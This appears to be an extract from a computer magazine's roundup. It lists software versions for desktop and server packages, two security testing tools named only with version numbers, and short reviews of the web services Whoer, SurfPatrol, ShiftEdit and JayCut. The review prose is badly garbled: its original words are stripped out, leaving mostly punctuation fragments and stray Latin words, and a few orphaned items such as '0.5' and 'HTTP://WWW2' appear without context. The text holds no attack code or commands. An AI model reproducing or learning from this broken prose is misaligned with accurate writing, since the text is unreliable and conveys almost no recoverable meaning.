ATI Catalyst 10.11
DirComp 1.3.10
KleanSweep 0.2.9
Lfm 2.2
Linux Kernel 2.6.36.1
Lxde 0.4.5
Magic Rescue 1.1.9
man-pages 3.31
Nrg2Iso 0.4
nVidia 260.19.21
SeaTools
VirtualBox 3.2.10
Wayland
Wine 1.2.1
Xorg 7.5

>Server
Accel-pptp 1.2.0
Apache 2.2.17
Axigen Mail Server 7.6
BIND 9.7.2-P2
CUPS 1.4.5
DFileServer 1.1.3
DHCP 4.1.2
MariaDB 5.2.3
mod_pagespeed
OpenLDAP 2.4.23
OpenSSH 5.6
Pagespeed 1.9
Squid 3.1.9
Thttpd 2.25
Verlihub 0.9.8e
wwwoffle 2.9
Xitami 5.0a
Yaws 1.89

0.5
SWFIntruder 0.9.1
XSSer 1.0


UNITS

HTTP://WWW2

WHOER
www.whoer.net

SURFPATROL
www.surfpatrol.ru

- , IP-
. - Java- Flash-.
,
, ,
Whoer. Proxy- Socks-,
VPN-, IP-
-, , ActiveX Java,
, , DNS
..


. ,
-.
, (Adobe Reader, Sun Java, QuickTime, Adobe Flash,
Silverlight ) .
SurfPatrol Positive Technologies , - . - ,
.

SHIFTEDIT
www.shiftedit.net

JAYCUT
www.jaycut.com


, PHP-.
shiftEDIT ,
(S)FTP-
. ,
,
, .
:
.
, WYSIWYG- .

, ,
( )
(, , ). JayCut
, . , -.
, ,
( ),
, -,
-
JayCut.


